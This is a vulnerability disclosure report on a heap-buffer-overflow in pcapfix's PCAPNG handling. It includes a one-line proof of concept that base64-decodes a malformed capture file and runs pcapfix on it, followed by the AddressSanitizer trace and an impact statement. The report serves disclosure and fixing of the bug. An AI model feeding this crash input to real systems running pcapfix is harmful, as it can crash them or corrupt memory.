Heap-based Buffer Overflow in Rup0rt/pcapfix

Reported on Jun 6th 2021

✍️ Description

Whilst testing pcapfix built from commit 5c2965 with Clang 13 (+ASan) on Ubuntu 20.04.2 LTS, we discovered a PCAPNG file which triggers a heap-buffer-overflow during a memcpy operation.

🕵️‍♂️ Proof of Concept

echo "Cg0NCgAAAADT1MOysvgUAAAAAEpaggAAoPWPsvgUAAAAAAAAAAAA" | base64 -d > /tmp/fuzz.pcap && ./pcapfix -s -v /tmp/fuzz.pcap

The above POC produces this output including Address Sanitizer stack trace:

[*] Reading from file: /tmp/fuzz.pcap
[*] Writing to file: fixed_fuzz.pcap
[*] File size: 39 bytes.
[+] This is a PCAPNG file.
[*] FOUND: Section Header Block at position 0 (0 bytes)
[-] Unknown Byte Order Magic: 0xb2c3d4d3 ==> CORRECTED.
[-] Major version number: 63666 ==> CORRECTED.
[-] Minor version number: 20 ==> CORRECTED.
[*] Section length: 143324300181504 ==> SETTING TO -1
[*] Block size adjusted (0 --> 28).
==2393459==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000051 at pc 0x0000004334b4 bp 0x7ffe43f9a430 sp 0x7ffe43f99bf0
READ of size 28 at 0x602000000051 thread T0
    #0 0x4334b3 in __interceptor_memcpy (/root/pcapfix/pcapfix+0x4334b3)
    #1 0x4dfb9d in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34:10
    #2 0x4dfb9d in fix_pcapng /root/pcapfix/pcapng.c:1361:7
    #3 0x4c9eec in main /root/pcapfix/pcapfix.c
    #4 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x41c58d in _start (/root/pcapfix/pcapfix+0x41c58d)

0x602000000051 is located 0 bytes to the right of 1-byte region [0x602000000050,0x602000000051)
allocated by thread T0 here:
    #0 0x497acd in __interceptor_malloc (/root/pcapfix/pcapfix+0x497acd)
    #1 0x4d829e in fix_pcapng /root/pcapfix/pcapng.c:210:17
    #2 0x4c9eec in main /root/pcapfix/pcapfix.c
    #3 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x4334b3) in __interceptor_memcpy

💥 Impact

This vulnerability is capable of crashing the software, causing memory corruption, and any other unintended consequences of reading past the end of the buffer.